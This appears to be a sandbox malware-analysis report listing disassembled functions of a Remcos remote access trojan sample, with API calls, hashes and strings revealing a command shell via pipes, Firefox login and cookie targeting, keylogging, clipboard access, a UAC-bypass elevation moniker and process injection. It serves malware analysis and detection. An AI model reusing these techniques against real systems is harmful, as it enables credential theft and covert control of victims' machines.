                            • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                            Function 0044B9CE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 0044B9EF
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: f9850f2e4451b66dc1836ae2daa4b0b8db6d154ee956e2f6ea7b1b5ba2d488f5
                            • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                            • Opcode Fuzzy Hash: f9850f2e4451b66dc1836ae2daa4b0b8db6d154ee956e2f6ea7b1b5ba2d488f5
                            • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                            Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                            Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                              • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw$ExceptionRaise
                            • String ID:
                            • API String ID: 3476068407-0
                            • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                            • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                            • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                            • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                            Function 0044EEC5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                            • _free.LIBCMT ref: 0044EF31
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                            • Instruction ID: a7d529a76fd4b3acccd1592f2db4ae6b5003facb603dcc9161a9cd98b3869489
                            • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                            • Instruction Fuzzy Hash: A0012B722003046BF321CF6AC84195AFBD9FB85370F25051EE58453280EA346806C778
                            Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                            • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                            • Opcode Fuzzy Hash: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                            • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
                            Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                            • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                            • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                            • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                            Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                            Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                            Non-executed Functions

                            Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                              • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                              • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                              • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                            • Sleep.KERNEL32(000007D0), ref: 00407976
                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                              • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                            • API String ID: 2918587301-599666313
                            • Opcode ID: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                            • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                            • Opcode Fuzzy Hash: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                            • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                            Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040508E
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • __Init_thread_footer.LIBCMT ref: 004050CB
                            • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                            • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                            • CloseHandle.KERNEL32 ref: 004053CD
                            • CloseHandle.KERNEL32 ref: 004053D5
                            • CloseHandle.KERNEL32 ref: 004053E7
                            • CloseHandle.KERNEL32 ref: 004053EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                            • API String ID: 3815868655-1274243119
                            • Opcode ID: d36a8bbb40631127541944604fe6f5ee6a940cd96aff17691e67f3fe21eb9100
                            • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                            • Opcode Fuzzy Hash: d36a8bbb40631127541944604fe6f5ee6a940cd96aff17691e67f3fe21eb9100
                            • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                            Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                            • API String ID: 65172268-860466531
                            • Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                            • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                            • Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                            • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                            Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                            • FindClose.KERNEL32(00000000), ref: 0040B517
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            • Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                            • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                            • Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                            • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                            Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            • Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                            • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                            • Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                            • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                            Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                            • API String ID: 726551946-3025026198
                            • Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                            • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                            • Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                            • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                            Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32 ref: 004159C7
                            • EmptyClipboard.USER32 ref: 004159D5
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                            • CloseClipboard.USER32 ref: 00415A5A
                            • OpenClipboard.USER32 ref: 00415A61
                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                            • CloseClipboard.USER32 ref: 00415A89
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID:
                            • API String ID: 3520204547-0
                            • Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                            • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                            • Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                            • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                            Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7
                            • API String ID: 0-3177665633
                            • Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                            • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                            • Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                            • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                            Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00409B3F
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                            • GetKeyState.USER32(00000010), ref: 00409B5C
                            • GetKeyboardState.USER32(?), ref: 00409B67
                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID: X[G
                            • API String ID: 1888522110-739899062
                            • Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                            • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                            • Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                            • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                            Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00406788
                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                            • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                            • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
